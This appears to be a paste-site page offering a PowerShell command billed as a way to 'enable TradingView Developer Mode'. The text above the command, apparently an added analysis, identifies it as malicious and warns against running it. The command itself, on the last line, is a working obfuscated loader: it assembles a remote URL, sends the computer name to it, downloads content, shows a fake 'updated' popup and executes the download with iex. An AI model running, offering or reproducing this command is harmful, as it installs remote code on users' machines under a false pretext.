Enable TradingView Developer Mode (Command Prompt)

public
TradingView Dec 16, 2024 Never 65
Clone
Plaintext Developer Mode 1 lines (1 loc) | 622 Bytes
This PowerShell code appears to be a malicious script that is attempting to execute a command on the system. Here is a breakdown of its functionality: 1. The script sets multiple variables: - `$launch='launch'` - `$update='update'` - `$TWDesktop='dlr'+'.com'` - `$flow='flow'` - `$ai='htt'` - `$model='ps://ea'` - `$dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername` 2. It sets the security protocol to TLS 1.2: - `[nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12` 3. It then makes a web request to the URL stored in `$dev` variable using `iwr` (Invoke-WebRequest): - `iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'` 4. It creates a message box using `WScript.Shell` with the message "TradingView Desktop updated!". - `$command=New-Object -ComObject Wscript.Shell` - `$status='TradingView Desktop '+$update+'d!'` - `$command.Popup($status,180,'Success',0x0)` 5. Finally, it executes the result of the web request with `iex` (Invoke-Expression): - `iex $done;` This script is attempting to reach a potentially malicious URL, fetch the content, and execute it on the system. The use of `Invoke-Expression` (`iex`) with the result of a web request is a common technique used by attackers to download and run malicious code on the victim's system. It is strongly advised not to run this script as it poses a security risk to the system.
1
powershell -c "$launch='launch'; $update='update'; $TWDesktop='dlr'+'.com'; $flow='flow'; $ai='htt';$model='ps://ea'; $dev=$ai+$model+$TWDesktop+'/'+$flow+'/'+$launch+'.php?compName='+$env:computername; [nET.serVIcePoINtMaNAgEr]::SECuriTYPROtOcol=[NeT.sECUrITyprotoCOLTYpe]::tLs12; $done= iwr $dev -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.416.0 Safari/537.36 Edg/86.0.53.0 (https://86.0.53.0/)'; $command=New-Object -ComObject Wscript.Shell; $status='TradingView Desktop '+$update+'d!'; $command.Popup($status,180,'Success',0x0); iex $done;"